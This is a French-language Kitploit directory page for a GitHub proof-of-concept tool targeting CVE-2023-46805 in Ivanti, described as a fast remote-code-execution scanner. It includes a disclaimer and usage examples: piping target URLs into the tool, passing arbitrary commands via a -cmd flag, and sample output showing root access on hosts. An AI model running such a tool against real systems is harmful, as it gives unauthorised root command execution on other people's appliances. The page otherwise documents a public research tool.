Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46805 — CVE-2023-46805 Ivanti POC RCE - Scanner ultra rapide. | Kitploit
Outils/GitHubGitHub/w2xim3/cve-2023-46805
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubw2xim3/cve-2023-46805

CVE-2023-46805

CVE-2023-46805 Ivanti POC RCE - Scanner ultra rapide.

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Titre : Preuve de concept pour CVE-2023-46805 - À des fins éducatives uniquement

Licence : Cette œuvre est placée sous la licence Creative Commons Attribution 4.0 International (CC BY 4.0). Vous êtes libre de partager, copier, distribuer et transmettre cette œuvre, de l'adapter ou de l'utiliser à d'autres fins, à condition que la paternité en soit correctement attribuée.

Avertissement : Cette preuve de concept (PoC) est fournie uniquement à des fins éducatives et de recherche en cybersécurité. Ni l'auteur, ni l'organisation affiliée, ni toute autre partie impliquée dans la création, la production ou la livraison de ce contenu ne pourra être tenue responsable de tout dommage, y compris, sans s'y limiter, les dommages directs, indirects, accessoires, spéciaux, consécutifs ou punitifs découlant de l'utilisation ou de l'incapacité à utiliser ce contenu.

Objectif pédagogique : Cette PoC a pour but d'aider la communauté de la cybersécurité à comprendre et à atténuer la vulnérabilité identifiée comme CVE-2023-46805. Elle ne doit pas être utilisée dans un environnement de production ni pour des activités malveillantes.

Description de la vulnérabilité : Ivanti RCE

Détails de la PoC :

root@kitploit:~
Usage of ./CVE-Ivanti:
  -cmd string
        The command to replace 'id' in the payload (default "id")
  -t int
        Number of concurrent threads (default 5)

root@kitploit:~
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'
Télécharger l’outil